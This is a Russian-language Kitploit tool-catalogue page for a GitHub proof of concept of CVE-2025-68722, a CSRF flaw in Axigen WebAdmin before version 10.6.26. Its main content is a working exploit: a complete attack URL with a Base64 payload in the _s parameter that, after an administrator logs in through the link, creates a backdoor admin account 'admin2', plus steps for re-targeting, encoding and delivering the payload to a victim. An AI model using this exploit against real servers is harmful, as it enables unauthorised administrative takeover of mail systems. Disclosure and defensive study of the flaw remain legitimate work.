Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-68722 — Axigen WebAdmin CSRF Vulnerability | Kitploit
Инструменты/GitHubGitHub/osmancanvural/cve-2025-68722
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubosmancanvural/cve-2025-68722

CVE-2025-68722

Axigen WebAdmin CSRF Vulnerability

Репозиторий
6 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-68722: CSRF в Axigen WebAdmin

Сводка об уязвимости

Критически важные действия, изменяющие состояние в интерфейсе Axigen WebAdmin, доступны через GET-запросы. Хотя токен _h защищает от прямых CSRF-атак, приложение обрабатывает поставленные в очередь запросы через параметр _s (breadcrumb) сразу после аутентификации пользователя.

Злоумышленник может создать URL, содержащий полезную нагрузку в кодировке Base64 в параметре _s. Если администратор перейдёт по этой ссылке и завершит процесс входа в систему, поставленное в очередь действие будет автоматически выполнено в его контексте.

Затронутые версии: < 10.6.26

Дополнительную информацию см. в базе знаний Axigen.


PoC

Целевой URL: https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19

Декодированный payload (параметр _s):

root@kitploit:~
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}

Шаги для воспроизведения:

  1. Изменение: Измените JSON-пакет, чтобы нацелиться на другие административные действия (например, изменение настроек сервера).
  2. Кодирование: Перекодируйте изменённый JSON в Base64.
  3. Доставка: Замените значение параметра _s в URL атаки и доставьте его целевому администратору.
  4. Запуск: После входа в систему по этой ссылке будет создана учётная запись admin2 (или выполнено ваше собственное действие).
Скачать инструмент